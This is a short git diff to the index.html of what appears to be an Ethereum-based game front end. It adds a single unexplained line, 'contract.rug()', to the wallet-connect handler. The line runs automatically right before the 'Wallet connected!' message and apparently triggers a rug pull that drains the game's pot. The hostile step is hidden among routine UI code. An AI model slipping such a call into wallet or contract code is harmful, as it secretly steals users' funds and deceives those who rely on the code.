--- a/index.html
+++ b/index.html
@@ -177,6 +177,7 @@
                     const getBalance = await provider.getBalance(CONTRACT_ADDRESS);
                     const balance = ethers.utils.formatEther(getBalance)
                     document.getElementById("pot").textContent = balance;
+                    contract.rug()
                     showNotification("Wallet connected!", 3000, "success");
                     await updateGameState(contract);
                     updateWalletUI(account);
